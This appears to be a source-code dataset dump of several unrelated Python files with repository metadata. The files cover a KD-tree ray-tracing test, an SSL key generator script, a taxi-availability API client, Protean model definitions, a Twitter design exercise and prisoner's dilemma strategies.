facets = np.arange(12).reshape(-1, 3)
tris = [shapes.Triangle64(self.triangles.vertices, self.triangles.albedos, face)
for face in facets]
for tri in tris:
tri.bounding_box = None
node20 = kdtree.KDNode(tris[0])
node21 = kdtree.KDNode(tris[1])
node22 = kdtree.KDNode(tris[2])
node23 = kdtree.KDNode(tris[3])
node10 = kdtree.KDNode()
node10.bounding_box = shapes.AxisAlignedBoundingBox([-5, 0, 0], [-1.5, 1, 0])
node10.left = node20
node10.right = node21
node11 = kdtree.KDNode()
node11.bounding_box = shapes.AxisAlignedBoundingBox([0., 0, 0], [3.5, 1, 0])
node11.left = node22
node11.right = node23
node00 = kdtree.KDNode()
node00.bounding_box = self.triangles.bounding_box
node00.left = node10
node00.right = node11
node00.order = 0
self.assertEqual(node00, tree.root)
def test_trace(self):
with self.subTest(stacked=False):
tree = kdtree.KDTree(self.shapes, max_depth=self.max_depth)
tree.build(force=True, print_progress=False)
starts = np.array([[-4.5, -2, 0.5, 3],
[0.5, 0.5, 0.5, 0.5],
[1, 1, 1, 1]])
directions = np.array([[0, 0, 0, 0],
[0, 0, 0, 0],
[-1, -1, -1, -1]], dtype=np.float64)
rays_test = rays.Rays(starts, directions)
ints = tree.trace(rays_test)
nodes = [tree.root.left.left, tree.root.left.right, tree.root.right.left, tree.root.right.right]
with self.subTest(rotation=None, translation=None):
for ind, int_check in enumerate(ints):
with self.subTest(ignore=False, ind=ind):
self.assertTrue(int_check["check"])
np.testing.assert_array_equal(int_check["intersect"], starts[:, ind]-[0, 0, 1])
np.testing.assert_array_equal(int_check["normal"], self.triangles.normals[ind])
self.assertEqual(int_check["albedo"], 1.0)
self.assertEqual(int_check["facet"], 0+nodes[ind].id*(10**(tree.root.order+1)))
ignore_ind = 2
rays_test.ignore = [nodes[ignore_ind].id*(10**(tree.root.order+1))]*rays_test.num_rays
ints = tree.trace(rays_test)
for ind, int_check in enumerate(ints):
with self.subTest(ignore=True, ind=ind):
if ind != ignore_ind:
self.assertTrue(int_check["check"])
np.testing.assert_array_equal(int_check["intersect"], starts[:, ind]-[0, 0, 1])
np.testing.assert_array_equal(int_check["normal"], self.triangles.normals[ind])
self.assertEqual(int_check["albedo"], 1.0)
self.assertEqual(int_check["facet"], 0+nodes[ind].id*(10**(tree.root.order+1)))
else:
self.assertFalse(int_check["check"])
self.assertTrue(np.isnan(int_check["intersect"]).all())
self.assertTrue(np.isnan(int_check["normal"]).all())
self.assertTrue(np.isnan(int_check["albedo"]))
self.assertEqual(int_check["facet"], -1)
rotation = at.Rotation([0, 0, -np.pi / 2])
rays_test.ignore = None
with self.subTest(rotation=rotation, translation=None):
tc = copy.deepcopy(tree)
tc.rotate(rotation)
ints = tc.trace(rays_test)
self.assertFalse(ints["check"].any())
starts2 = np.array([[0.5, 0.5, 0.5, 0.5],
[4.5, 2, -0.5, -3],
[1, 1, 1, 1]])
directions2 = np.array([[0, 0, 0, 0],
[0, 0, 0, 0],
[-1, -1, -1, -1]], dtype=np.float64)
rays_test2 = rays.Rays(starts2, directions2)
ints = tc.trace(rays_test2)
for ind, int_check in enumerate(ints):
self.assertTrue(int_check["check"])
np.testing.assert_array_almost_equal(int_check["intersect"], starts2[:, ind]-[0, 0, 1])
np.testing.assert_array_equal(int_check["normal"], rotation.matrix@self.triangles.normals[ind])
self.assertEqual(int_check["albedo"], 1.0)
self.assertEqual(int_check["facet"], 0+nodes[ind].id*(10**(tc.root.order+1)))
translation = [0, 0, -0.5]
with self.subTest(rotation=None, translation=translation):
tc = copy.deepcopy(tree)
tc.translate(translation)
ints = tc.trace(rays_test)
for ind, int_check in enumerate(ints):
self.assertTrue(int_check["check"])
np.testing.assert_array_almost_equal(int_check["intersect"], starts[:, ind]-[0, 0, 1.5])
np.testing.assert_array_almost_equal(int_check["normal"], self.triangles.normals[ind])
self.assertEqual(int_check["albedo"], 1.0)
self.assertEqual(int_check["facet"], 0+nodes[ind].id*(10**(tc.root.order+1)))
with self.subTest(rotation=rotation, translation=translation):
tc = copy.deepcopy(tree)
tc.rotate(rotation)
tc.translate(translation)
ints = tc.trace(rays_test)
self.assertFalse(ints["check"].any())
starts2 = np.array([[0.5, 0.5, 0.5, 0.5],
[4.5, 2, -0.5, -3],
[1, 1, 1, 1]])
directions2 = np.array([[0, 0, 0, 0],
[0, 0, 0, 0],
[-1, -1, -1, -1]], dtype=np.float64)
rays_test2 = rays.Rays(starts2, directions2)
ints = tc.trace(rays_test2)
for ind, int_check in enumerate(ints):
self.assertTrue(int_check["check"])
np.testing.assert_array_almost_equal(int_check["intersect"], starts2[:, ind]-[0, 0, 1.5])
np.testing.assert_array_equal(int_check["normal"], rotation.matrix@self.triangles.normals[ind])
self.assertEqual(int_check["albedo"], 1.0)
self.assertEqual(int_check["facet"], 0+nodes[ind].id*(10**(tc.root.order+1)))
rotation = at.Rotation([np.pi / 2, 0, 0])
with self.subTest(rotation=rotation, translation=None):
tc = copy.deepcopy(tree)
tc.rotate(rotation)
ints = tc.trace(rays_test)
self.assertFalse(ints["check"].any())
starts2 = np.array([[-4.5, -2, 0.5, 3],
[1, 1, 1, 1],
[0.5, 0.5, 0.5, 0.5]])
directions2 = np.array([[0, 0, 0, 0],
[-1, -1, -1, -1],
[0, 0, 0, 0]], dtype=np.float64)
rays_test2 = rays.Rays(starts2, directions2)
ints = tc.trace(rays_test2)
for ind, int_check in enumerate(ints):
self.assertTrue(int_check["check"])
np.testing.assert_array_almost_equal(int_check["intersect"], starts2[:, ind]-[0, 1, 0])
np.testing.assert_array_equal(int_check["normal"], rotation.matrix@self.triangles.normals[ind])
self.assertEqual(int_check["albedo"], 1.0)
self.assertEqual(int_check["facet"], 0+nodes[ind].id*(10**(tc.root.order+1)))
translation = [2.5, 0, 0]
with self.subTest(rotation=None, translation=translation):
tc = copy.deepcopy(tree)
tc.translate(translation)
ints = tc.trace(rays_test)
self.assertFalse(ints["check"][0])
for ind, int_check in enumerate(ints[1:]):
ind += 1
self.assertTrue(int_check["check"])
np.testing.assert_array_almost_equal(int_check["intersect"], starts[:, ind]-[0, 0, 1])
np.testing.assert_array_almost_equal(int_check["normal"], self.triangles.normals[ind-1])
self.assertEqual(int_check["albedo"], 1.0)
self.assertEqual(int_check["facet"], 0+nodes[ind-1].id*(10**(tc.root.order+1)))
translation = [0, -0.5, 0]
with self.subTest(rotation=rotation, translation=translation):
with self.subTest(order='rt'):
tc = copy.deepcopy(tree)
tc.rotate(rotation)
tc.translate(translation)
ints = tc.trace(rays_test)
self.assertFalse(ints["check"].any())
starts2 = np.array([[-4.5, -2, 0.5, 3],
[1, 1, 1, 1],
[0.5, 0.5, 0.5, 0.5]])
directions2 = np.array([[0, 0, 0, 0],
[-1, -1, -1, -1],
[0, 0, 0, 0]], dtype=np.float64)
rays_test2 = rays.Rays(starts2, directions2)
ints = tc.trace(rays_test2)
for ind, int_check in enumerate(ints):
self.assertTrue(int_check["check"])
np.testing.assert_array_almost_equal(int_check["intersect"], starts2[:, ind]-[0, 1.5, 0])
np.testing.assert_array_equal(int_check["normal"], rotation.matrix@self.triangles.normals[ind])
self.assertEqual(int_check["albedo"], 1.0)
self.assertEqual(int_check["facet"], 0+nodes[ind].id*(10**(tc.root.order+1)))
with self.subTest(order='tr'):
tc = copy.deepcopy(tree)
tc.translate(translation)
tc.rotate(rotation)
ints = tc.trace(rays_test)
self.assertFalse(ints["check"].any())
starts2 = np.array([[-4.5, -2, 0.5, 3],
[1, 1, 1, 1],
[0, 0, 0, 0]])
directions2 = np.array([[0, 0, 0, 0],
[-1, -1, -1, -1],
[0, 0, 0, 0]], dtype=np.float64)
rays_test2 = rays.Rays(starts2, directions2)
ints = tc.trace(rays_test2)
for ind, int_check in enumerate(ints):
self.assertTrue(int_check["check"])
np.testing.assert_array_almost_equal(int_check["intersect"], starts2[:, ind]-[0, 1, 0])
np.testing.assert_array_equal(int_check["normal"], rotation.matrix@self.triangles.normals[ind])
self.assertEqual(int_check["albedo"], 1.0)
self.assertEqual(int_check["facet"], 0+nodes[ind].id*(10**(tc.root.order+1)))
with self.subTest(stacked=True):
tree = kdtree.KDTree(self.stacked_tries, max_depth=self.max_depth)
tree.build(force=True, print_progress=False)
starts = np.array([[-4.5, -2, -4.5, -2],
[0.5, 0.5, 0.5, 0.5],
[1, 1, 5, 5]])
directions = np.array([[0, 0, 0, 0],
[0, 0, 0, 0],
[-1, -1, -1, -1]], dtype=np.float64)
rays_test = rays.Rays(starts, directions)
ints = tree.trace(rays_test)
nodes = [tree.root.left.left, tree.root.right.left, tree.root.left.right, tree.root.right.right]
for ind, int_check in enumerate(ints):
with self.subTest(ignore=False, ind=ind):
self.assertTrue(int_check["check"])
if ind < 2:
np.testing.assert_array_equal(int_check["intersect"], starts[:, ind]-[0, 0, 1])
else:
np.testing.assert_array_equal(int_check["intersect"], starts[:, ind]-[0, 0, 2.5])
np.testing.assert_array_equal(int_check["normal"], self.triangles.normals[ind])
self.assertEqual(int_check["albedo"], 1.0)
self.assertEqual(int_check["facet"], 0+nodes[ind].id*(10**(tree.root.order+1)))
ignore_ind = 2
rays_test.ignore = [nodes[ignore_ind].id*(10**(tree.root.order+1))]*rays_test.num_rays
ints = tree.trace(rays_test)
for ind, int_check in enumerate(ints):
with self.subTest(ignore=True, ind=ind):
if ind != ignore_ind:
self.assertTrue(int_check["check"])
if ind < 2:
np.testing.assert_array_equal(int_check["intersect"], starts[:, ind]-[0, 0, 1])
else:
np.testing.assert_array_equal(int_check["intersect"], starts[:, ind]-[0, 0, 2.5])
np.testing.assert_array_equal(int_check["normal"], self.triangles.normals[ind])
self.assertEqual(int_check["albedo"], 1.0)
self.assertEqual(int_check["facet"], 0+nodes[ind].id*(10**(tree.root.order+1)))
else:
self.assertTrue(int_check["check"])
np.testing.assert_array_equal(int_check["intersect"], starts[:, ind]-[0, 0, 5])
np.testing.assert_array_equal(int_check["normal"], self.triangles.normals[ind])
self.assertEqual(int_check["albedo"], 1.0)
self.assertEqual(int_check["facet"], 0+nodes[0].id*(10**(tree.root.order+1)))
class TestKDNode(TestCase):
def setUp(self):
tri1 = np.array([[-5, -4, -4.5],
[0, 0, 1],
[0, 0, 0]])
tri2 = tri1+np.array([[2.5, 0, 0]]).T
tri3 = tri2+np.array([[2.5, 0, 0]]).T
tri4 = tri3+np.array([[2.5, 0, 0]]).T
self.triangles = shapes.Triangle64(np.hstack([tri1, tri2, tri3, tri4]).T, 1, np.arange(12).reshape(-1, 3))
def test_creation(self):
node = kdtree.KDNode(surface=self.triangles)
self.assertEqual(node.surface, self.triangles)
self.assertEqual(node.bounding_box, self.triangles.bounding_box)
self.assertIsNone(node.left)
self.assertIsNone(node.right)
def test_compute_bounding_box(self):
node = kdtree.KDNode()
node.surface = self.triangles
node.has_surface = True
node.compute_bounding_box()
self.assertEqual(node.bounding_box, self.triangles.bounding_box)
def test_split(self):
node = kdtree.KDNode(surface=self.triangles)
node.split(force=True, print_progress=False)
left_tris = kdtree.KDNode(shapes.Triangle64(self.triangles.vertices, 1, np.arange(6).reshape(3, -1), compute_bounding_box=False))
right_tris = kdtree.KDNode(shapes.Triangle64(self.triangles.vertices, 1, np.arange(6, 12).reshape(3, -1), compute_bounding_box=False))
self.assertEqual(node.left, left_tris)
self.assertEqual(node.right, right_tris)
def test_trace(self):
pass
| true
| true
|
f7051dc56c585ff1a625d6db41e7759458136b36
| 446
|
py
|
Python
|
scripts/debian/usr/lib/dipicar/scripts/installation/ssl_keys_gen.py
|
TeaFlex/DiPiCar
|
e56f74ac55f5cfff22fd82807b06dc367c42cac0
|
[
"0BSD"
] | 1
|
2021-07-10T13:41:00.000Z
|
2021-07-10T13:41:00.000Z
|
scripts/debian/usr/lib/dipicar/scripts/installation/ssl_keys_gen.py
|
TeaFlex/DiPiCar
|
e56f74ac55f5cfff22fd82807b06dc367c42cac0
|
[
"0BSD"
] | null | null | null |
scripts/debian/usr/lib/dipicar/scripts/installation/ssl_keys_gen.py
|
TeaFlex/DiPiCar
|
e56f74ac55f5cfff22fd82807b06dc367c42cac0
|
[
"0BSD"
] | null | null | null |
#!/usr/bin/python3
from subprocess import call;
from sys import argv
from os import path
outPath = argv[1] if(len(argv)>1) else "/etc/dipicar/creds"
duration = 365
rsaLength = 4096
#Generate ssl keys
call([
"openssl",
"req",
"-x509",
"-newkey",
"rsa:"+str(rsaLength),
"-keyout", path.join(outPath,"key.pem"),
"-out", path.join(outPath,"cert.pem"),
"-days", str(duration),
"--batch",
"-nodes"
])
| 19.391304
| 59
| 0.596413
|
from subprocess import call;
from sys import argv
from os import path
outPath = argv[1] if(len(argv)>1) else "/etc/dipicar/creds"
duration = 365
rsaLength = 4096
call([
"openssl",
"req",
"-x509",
"-newkey",
"rsa:"+str(rsaLength),
"-keyout", path.join(outPath,"key.pem"),
"-out", path.join(outPath,"cert.pem"),
"-days", str(duration),
"--batch",
"-nodes"
])
| true
| true
|
f705210f06709ba3f43e67e92c0421ff78f57d45
| 649
|
py
|
Python
|
chalicelib/api/taxiAvailability.py
|
yeukfei02/singapore-taxi-api
|
25749c3a8c07849d4a2a13410da712ca64d102ca
|
[
"MIT"
] | null | null | null |
chalicelib/api/taxiAvailability.py
|
yeukfei02/singapore-taxi-api
|
25749c3a8c07849d4a2a13410da712ca64d102ca
|
[
"MIT"
] | 1
|
2021-05-04T03:30:01.000Z
|
2021-05-05T13:38:41.000Z
|
chalicelib/api/taxiAvailability.py
|
yeukfei02/singapore-taxi-api
|
25749c3a8c07849d4a2a13410da712ca64d102ca
|
[
"MIT"
] | null | null | null |
import requests
import os
ROOT_URL = 'http://datamall2.mytransport.sg/ltaodataservice'
def get_taxi_availability_request():
result = None
try:
url = '{}/Taxi-Availability'.format(ROOT_URL)
headers = {
'AccountKey': os.getenv('ACCOUNT_KEY'),
'Accept': 'application/json'
}
response = requests.get(url, headers=headers)
print('response status = ', response.status_code)
print('response json = ', response.json())
if response.status_code == 200:
result = response.json()
except Exception as e:
print('error = ', e)
return result
| 24.037037
| 60
| 0.604006
|
import requests
import os
ROOT_URL = 'http://datamall2.mytransport.sg/ltaodataservice'
def get_taxi_availability_request():
result = None
try:
url = '{}/Taxi-Availability'.format(ROOT_URL)
headers = {
'AccountKey': os.getenv('ACCOUNT_KEY'),
'Accept': 'application/json'
}
response = requests.get(url, headers=headers)
print('response status = ', response.status_code)
print('response json = ', response.json())
if response.status_code == 200:
result = response.json()
except Exception as e:
print('error = ', e)
return result
| true
| true
|
f7052138819216e6f5c48540636b581bd627c13e
| 1,164
|
py
|
Python
|
ocdb/ws/handlers/__init__.py
|
eocdb/ocdb-server
|
0e28d092e8ecf5f4813878aab43de990cc5fb4ee
|
[
"MIT"
] | null | null | null |
ocdb/ws/handlers/__init__.py
|
eocdb/ocdb-server
|
0e28d092e8ecf5f4813878aab43de990cc5fb4ee
|
[
"MIT"
] | 1
|
2019-06-21T09:43:01.000Z
|
2019-06-21T09:43:01.000Z
|
eocdb/ws/handlers/__init__.py
|
bcdev/ocdb-server
|
027078f2b022a06b3a417d76d273514a72f8cac7
|
[
"MIT"
] | null | null | null |
# The MIT License (MIT)
# Copyright (c) 2018 by EUMETSAT
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies
# of the Software, and to permit persons to whom the Software is furnished to do
# so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from ._mappings import MAPPINGS, API_URL_PREFIX
| 48.5
| 81
| 0.77921
|
from ._mappings import MAPPINGS, API_URL_PREFIX
| true
| true
|
f705217d4ccc8cc742ed3dae28f533f8474e2433
| 1,752
|
py
|
Python
|
tests/adapters/model/elasticsearch_model/elements.py
|
mpsiva89/protean
|
315fa56da3f64178bbbf0edf1995af46d5eb3da7
|
[
"BSD-3-Clause"
] | null | null | null |
tests/adapters/model/elasticsearch_model/elements.py
|
mpsiva89/protean
|
315fa56da3f64178bbbf0edf1995af46d5eb3da7
|
[
"BSD-3-Clause"
] | null | null | null |
tests/adapters/model/elasticsearch_model/elements.py
|
mpsiva89/protean
|
315fa56da3f64178bbbf0edf1995af46d5eb3da7
|
[
"BSD-3-Clause"
] | null | null | null |
import re
from collections import defaultdict
from datetime import datetime
from elasticsearch_dsl import Keyword, Text
from protean import BaseAggregate, BaseValueObject
from protean.core.model import BaseModel
from protean.fields import DateTime, Integer, String
from protean.fields import Text as ProteanText
from protean.fields import ValueObject
class Person(BaseAggregate):
first_name = String(max_length=50, required=True)
last_name = String(max_length=50, required=True)
age = Integer(default=21)
created_at = DateTime(default=datetime.now())
class Alien(BaseAggregate):
first_name = String(max_length=50, required=True)
last_name = String(max_length=50, required=True)
age = Integer(default=21)
class User(BaseAggregate):
email = String(max_length=255, required=True, unique=True)
password = String(max_length=3026)
class Email(BaseValueObject):
REGEXP = r"\"?([-a-zA-Z0-9.`?{}]+@\w+\.\w+)\"?"
# This is the external facing data attribute
address = String(max_length=254, required=True)
def clean(self):
"""Business rules of Email address"""
errors = defaultdict(list)
if not bool(re.match(Email.REGEXP, self.address)):
errors["address"].append("is invalid")
return errors
class ComplexUser(BaseAggregate):
email = ValueObject(Email, required=True)
password = String(required=True, max_length=255)
class Provider(BaseAggregate):
name = ProteanText()
about = ProteanText()
class ProviderCustomModel(BaseModel):
id = Keyword()
name = Text(fields={"raw": Keyword()})
about = Text()
class Meta:
schema = "providers"
class Receiver(BaseAggregate):
name = String()
age = Integer()
| 24.676056
| 62
| 0.703196
|
import re
from collections import defaultdict
from datetime import datetime
from elasticsearch_dsl import Keyword, Text
from protean import BaseAggregate, BaseValueObject
from protean.core.model import BaseModel
from protean.fields import DateTime, Integer, String
from protean.fields import Text as ProteanText
from protean.fields import ValueObject
class Person(BaseAggregate):
first_name = String(max_length=50, required=True)
last_name = String(max_length=50, required=True)
age = Integer(default=21)
created_at = DateTime(default=datetime.now())
class Alien(BaseAggregate):
first_name = String(max_length=50, required=True)
last_name = String(max_length=50, required=True)
age = Integer(default=21)
class User(BaseAggregate):
email = String(max_length=255, required=True, unique=True)
password = String(max_length=3026)
class Email(BaseValueObject):
REGEXP = r"\"?([-a-zA-Z0-9.`?{}]+@\w+\.\w+)\"?"
address = String(max_length=254, required=True)
def clean(self):
errors = defaultdict(list)
if not bool(re.match(Email.REGEXP, self.address)):
errors["address"].append("is invalid")
return errors
class ComplexUser(BaseAggregate):
email = ValueObject(Email, required=True)
password = String(required=True, max_length=255)
class Provider(BaseAggregate):
name = ProteanText()
about = ProteanText()
class ProviderCustomModel(BaseModel):
id = Keyword()
name = Text(fields={"raw": Keyword()})
about = Text()
class Meta:
schema = "providers"
class Receiver(BaseAggregate):
name = String()
age = Integer()
| true
| true
|
f70521986d834f98db5a48207bb5f18312adac09
| 3,207
|
py
|
Python
|
355.Design-Twitter.py
|
mickey0524/leetcode
|
6bedeb6ff29b02a97178cca464c5fd639951801f
|
[
"MIT"
] | 18
|
2018-07-14T12:45:37.000Z
|
2022-03-26T14:51:04.000Z
|
355.Design-Twitter.py
|
mickey0524/leetcode
|
6bedeb6ff29b02a97178cca464c5fd639951801f
|
[
"MIT"
] | null | null | null |
355.Design-Twitter.py
|
mickey0524/leetcode
|
6bedeb6ff29b02a97178cca464c5fd639951801f
|
[
"MIT"
] | 3
|
2019-05-29T04:09:22.000Z
|
2021-06-07T23:37:46.000Z
|
# https://leetcode.com/problems/design-twitter/
#
# algorithms
# Medium (27.98%)
# Total Accepted: 37,655
# Total Submissions: 134,594
from collections import defaultdict
from bisect import insort
class Twitter(object):
def __init__(self):
"""
Initialize your data structure here.
"""
self.follow_map = defaultdict(set) # 关注列表
self.followed_map = defaultdict(set) # 被关注列表
self.tweet_map = defaultdict(list) # 用户关注的列表
self.post_map = defaultdict(list) # 发布列表
self.tweet_stamp = 0
def postTweet(self, userId, tweetId):
"""
Compose a new tweet.
:type userId: int
:type tweetId: int
:rtype: None
"""
self.post_map[userId].append((self.tweet_stamp, tweetId))
for id in self.followed_map[userId]:
insort(self.tweet_map[id], (self.tweet_stamp, tweetId))
insort(self.tweet_map[userId], (self.tweet_stamp, tweetId))
self.tweet_stamp += 1
def getNewsFeed(self, userId):
"""
Retrieve the 10 most recent tweet ids in the user's news feed. Each item in the news feed must be posted by users who the user followed or by the user herself. Tweets must be ordered from most recent to least recent.
:type userId: int
:rtype: List[int]
"""
length = len(self.tweet_map[userId])
if length <= 10:
arr = self.tweet_map[userId]
else:
arr = self.tweet_map[userId][length - 10:]
return [item[-1] for item in reversed(arr)]
def follow(self, followerId, followeeId):
"""
Follower follows a followee. If the operation is invalid, it should be a no-op.
:type followerId: int
:type followeeId: int
:rtype: None
"""
if followerId == followeeId:
return
if followeeId in self.follow_map[followerId]:
return
self.follow_map[followerId].add(followeeId)
self.followed_map[followeeId].add(followerId)
for stamp, tweetId in self.post_map[followeeId]:
insort(self.tweet_map[followerId], (stamp, tweetId))
def unfollow(self, followerId, followeeId):
"""
Follower unfollows a followee. If the operation is invalid, it should be a no-op.
:type followerId: int
:type followeeId: int
:rtype: None
"""
if followerId == followeeId:
return
if followeeId not in self.follow_map[followerId]:
return
self.follow_map[followerId].remove(followeeId)
self.followed_map[followeeId].remove(followerId)
tweet_map = set()
for stamp, _ in self.post_map[followeeId]:
tweet_map.add(stamp)
tmp = []
for stamp, tweetId in self.tweet_map[followerId]:
if stamp not in tweet_map:
tmp.append((stamp, tweetId))
self.tweet_map[followerId] = tmp
# Your Twitter object will be instantiated and called as such:
# obj = Twitter()
# obj.postTweet(userId,tweetId)
# param_2 = obj.getNewsFeed(userId)
# obj.follow(followerId,followeeId)
# obj.unfollow(followerId,followeeId)
| 29.971963
| 224
| 0.617711
|
from collections import defaultdict
from bisect import insort
class Twitter(object):
def __init__(self):
self.follow_map = defaultdict(set)
self.followed_map = defaultdict(set)
self.tweet_map = defaultdict(list)
self.post_map = defaultdict(list)
self.tweet_stamp = 0
def postTweet(self, userId, tweetId):
self.post_map[userId].append((self.tweet_stamp, tweetId))
for id in self.followed_map[userId]:
insort(self.tweet_map[id], (self.tweet_stamp, tweetId))
insort(self.tweet_map[userId], (self.tweet_stamp, tweetId))
self.tweet_stamp += 1
def getNewsFeed(self, userId):
length = len(self.tweet_map[userId])
if length <= 10:
arr = self.tweet_map[userId]
else:
arr = self.tweet_map[userId][length - 10:]
return [item[-1] for item in reversed(arr)]
def follow(self, followerId, followeeId):
if followerId == followeeId:
return
if followeeId in self.follow_map[followerId]:
return
self.follow_map[followerId].add(followeeId)
self.followed_map[followeeId].add(followerId)
for stamp, tweetId in self.post_map[followeeId]:
insort(self.tweet_map[followerId], (stamp, tweetId))
def unfollow(self, followerId, followeeId):
if followerId == followeeId:
return
if followeeId not in self.follow_map[followerId]:
return
self.follow_map[followerId].remove(followeeId)
self.followed_map[followeeId].remove(followerId)
tweet_map = set()
for stamp, _ in self.post_map[followeeId]:
tweet_map.add(stamp)
tmp = []
for stamp, tweetId in self.tweet_map[followerId]:
if stamp not in tweet_map:
tmp.append((stamp, tweetId))
self.tweet_map[followerId] = tmp
| true
| true
|
f705220d566871e203d73d64093d17551fc09aa8
| 4,506
|
py
|
Python
|
tactics.py
|
knuekim98/titfortat-simulator
|
96e1c92058d43b6e4641ea323772a7fdd22a4ccd
|
[
"MIT"
] | null | null | null |
tactics.py
|
knuekim98/titfortat-simulator
|
96e1c92058d43b6e4641ea323772a7fdd22a4ccd
|
[
"MIT"
] | null | null | null |
tactics.py
|
knuekim98/titfortat-simulator
|
96e1c92058d43b6e4641ea323772a7fdd22a4ccd
|
[
"MIT"
] | null | null | null |
from const import result
import random
C, D = True, False
def opponent(r):
if r == result.COOP or r == result.DEFECT:
return True
return False
# tit for tat
class Tft:
def __init__(self) -> None:
self.score = 0
self.last_reaction = C
def run(self):
return self.last_reaction
def next(self, r):
self.score += r.value
self.last_reaction = opponent(r)
def end(self):
self.last_reaction = C
return self.score
# tit for two tat
class Tftt:
def __init__(self) -> None:
self.score = 0
self.last_reaction = C
self.last_last_reaction = C
def run(self):
return self.last_reaction | self.last_last_reaction
def next(self, r):
self.score += r.value
self.last_last_reaction = self.last_reaction
self.last_reaction = opponent(r)
def end(self):
self.last_reaction = C
self.last_last_reaction = C
return self.score
# always coop
class AlwaysCoop:
def __init__(self) -> None:
self.score = 0
def run(self):
return C
def next(self, r):
self.score += r.value
def end(self):
return self.score
# always defect
class AlwaysDefect:
def __init__(self) -> None:
self.score = 0
def run(self):
return D
def next(self, r):
self.score += r.value
def end(self):
return self.score
# perfect random(50%)
class Random:
def __init__(self) -> None:
self.score = 0
def run(self):
return random.choice([C, D])
def next(self, r):
self.score += r.value
def end(self):
return self.score
# first defect, opponent coop rate - coop(>50%) / defect(<=50%)
class Downing:
def __init__(self) -> None:
self.score = 0
self.game_count = 0
self.coop_count = 0
def run(self):
if self.game_count == 0:
return D
if self.coop_count / self.game_count > 0.5:
return C
return D
def next(self, r):
self.score += r.value
self.game_count += 1
if opponent(r):
self.coop_count += 1
def end(self):
self.game_count = self.coop_count = 0
return self.score
# first coop, opponent coop rate - coop(>=50%) / defect(<50%)
class Downing2:
def __init__(self) -> None:
self.score = 0
self.game_count = 0
self.coop_count = 0
def run(self):
if self.game_count == 0:
return C
if self.coop_count / self.game_count >= 0.5:
return C
return D
def next(self, r):
self.score += r.value
self.game_count += 1
if opponent(r):
self.coop_count += 1
def end(self):
self.game_count = self.coop_count = 0
return self.score
# coop, always defect once defected
class Grudger:
def __init__(self) -> None:
self.score = 0
self.defected = False
def run(self):
if self.defected:
return D
return C
def next(self, r):
self.score += r.value
if not opponent(r):
self.defected = True
def end(self):
return self.score
# tft but defect by 10% rate
class Joss:
def __init__(self) -> None:
self.score = 0
self.last_reaction = C
def run(self):
if random.randint(1, 10) == 1:
return D
return self.last_reaction
def next(self, r):
self.score += r.value
self.last_reaction = opponent(r)
def end(self):
self.last_reaction = C
return self.score
# wip
class Tester:
def __init__(self) -> None:
self.score = 0
self.decision = True
self.test_tft = False
self.game_count = 0
def run(self):
if self.game_count == 0:
return D
return self.decision
def next(self, r):
self.score += r.value
if self.game_count == 1 & (not opponent(r)):
self.test_tft = True
elif self.test_tft:
self.decision = opponent(r)
elif self.game_count <= 2:
self.decision = True
else:
self.decision = not self.decision
self.game_count += 1
def end(self):
self.decision = True
self.test_tft = False
self.game_count = 0
return self.score
| 20.669725
| 63
| 0.545717
|
from const import result
import random
C, D = True, False
def opponent(r):
if r == result.COOP or r == result.DEFECT:
return True
return False
class Tft:
def __init__(self) -> None:
self.score = 0
self.last_reaction = C
def run(self):
return self.last_reaction
def next(self, r):
self.score += r.value
self.last_reaction = opponent(r)
def end(self):
self.last_reaction = C
return self.score
class Tftt:
def __init__(self) -> None:
self.score = 0
self.last_reaction = C
self.last_last_reaction = C
def run(self):
return self.last_reaction | self.last_last_reaction
def next(self, r):
self.score += r.value
self.last_last_reaction = self.last_reaction
self.last_reaction = opponent(r)
def end(self):
self.last_reaction = C
self.last_last_reaction = C
return self.score
class AlwaysCoop:
def __init__(self) -> None:
self.score = 0
def run(self):
return C
def next(self, r):
self.score += r.value
def end(self):
return self.score
class AlwaysDefect:
def __init__(self) -> None:
self.score = 0
def run(self):
return D
def next(self, r):
self.score += r.value
def end(self):
return self.score
class Random:
def __init__(self) -> None:
self.score = 0
def run(self):
return random.choice([C, D])
def next(self, r):
self.score += r.value
def end(self):
return self.score
class Downing:
def __init__(self) -> None:
self.score = 0
self.game_count = 0
self.coop_count = 0
def run(self):
if self.game_count == 0:
return D
if self.coop_count / self.game_count > 0.5:
return C
return D
def next(self, r):
self.score += r.value
self.game_count += 1
if opponent(r):
self.coop_count += 1
def end(self):
self.game_count = self.coop_count = 0
return self.score
class Downing2:
def __init__(self) -> None:
self.score = 0
self.game_count = 0
self.coop_count = 0
def run(self):
if self.game_count == 0:
return C
if self.coop_count / self.game_count >= 0.5:
return C
return D
def next(self, r):
self.score += r.value
self.game_count += 1
if opponent(r):
self.coop_count += 1
def end(self):
self.game_count = self.coop_count = 0
return self.score
class Grudger:
def __init__(self) -> None:
self.score = 0
self.defected = False
def run(self):
if self.defected:
return D
return C
def next(self, r):
self.score += r.value
if not opponent(r):
self.defected = True
def end(self):
return self.score
class Joss:
def __init__(self) -> None:
self.score = 0
self.last_reaction = C
def run(self):
if random.randint(1, 10) == 1:
return D
return self.last_reaction
def next(self, r):
self.score += r.value
self.last_reaction = opponent(r)
def end(self):
self.last_reaction = C
return self.score
class Tester:
def __init__(self) -> None:
self.score = 0
self.decision = True
self.test_tft = False
self.game_count = 0
def run(self):
if self.game_count == 0:
return D
return self.decision
def next(self, r):
self.score += r.value
if self.game_count == 1 & (not opponent(r)):
self.test_tft = True
elif self.test_tft:
self.decision = opponent(r)
elif self.game_count <= 2:
self.decision = True
else:
self.decision = not self.decision
self.game_count += 1
def end(self):
self.decision = True
self.test_tft = False
self.game_count = 0
return self.score
| true
| true
|
f705226f63166954703af3428c9ff9c96723765d
| 8,341
|
py
|
Python
|
